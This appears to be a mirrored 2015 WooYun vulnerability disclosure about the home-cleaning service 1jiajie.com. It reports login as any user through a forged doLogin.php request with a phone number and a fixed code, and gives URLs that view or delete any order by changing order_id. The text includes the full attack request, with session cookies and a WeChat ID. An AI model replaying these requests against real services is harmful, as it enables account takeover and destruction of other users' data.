乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-20: 细节已通知厂商并且等待厂商处理中 2015-10-25: 厂商已经主动忽略漏洞,细节向公众公开
E家洁某处设计不当导致 任意用户登录
微信公众号:
POST /doLogin.php HTTP/1.1Accept-Language: zh-CNX-Requested-With: XMLHttpRequestAccept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7Referer: http://m.1jiajie.com/login.php?from=wx&weixin_id=o7KvajnDlhdcL55L3CNAUepawQC4User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; zh-cn; MI 2S Build/JRO03L) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025469 Mobile Safari/533.1 MicroMessenger/6.2.5.54_re87237d.622 NetType/WIFI Language/zh_CNOrigin: http://m.1jiajie.comAccept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzipHost: m.1jiajie.comCookie: Hm_lpvt_2fe9165c0d54a831546cc00eecdb0026=1445283698; Hm_lpvt_3163173ca7cc1075e84e6a692b711f3d=1445283698; Hm_lvt_2fe9165c0d54a831546cc00eecdb0026=1445283304,1445283697; Hm_lvt_3163173ca7cc1075e84e6a692b711f3d=1445283304,1445283698; PHPSESSID=0ckn82udq71jdm2l5h3n2rprb0; address0=; address1=; bd_st=%28%7B%22s%22%3A1445283754058%2C%22r%22%3A%22php%3Ffrom%3Dwx%26weixin_id%3Do7KvajnDlhdcL55L3CNAUepawQC4%22%7D%29; city_name=%E5%8C%97%E4%BA%AC; order_place_detail=; order_street=; wx_from=wxContent-Length: 105user_phone=18888888888&user_code=1234&login_type=0&weixin_id=o7KvajnDlhdcL55L3CNAUepawQC4&wx_qr_code_id=0
pc端也存在,方法和上面一样:
https://mm.1jiajie.com/index.php
任意订单浏览:
https://mm.1jiajie.com/orderDetails.php?order_id=123&platform_version=wap3.0&type=order_details
任意订单删除:
https://mm.1jiajie.com/dmyOrder.php?order_id=123&platform_version=wap3.0&type=delete_order
↑
:P
危害等级:无影响厂商忽略
忽略时间:2015-10-25 10:14
漏洞Rank:4 (WooYun评价)
暂无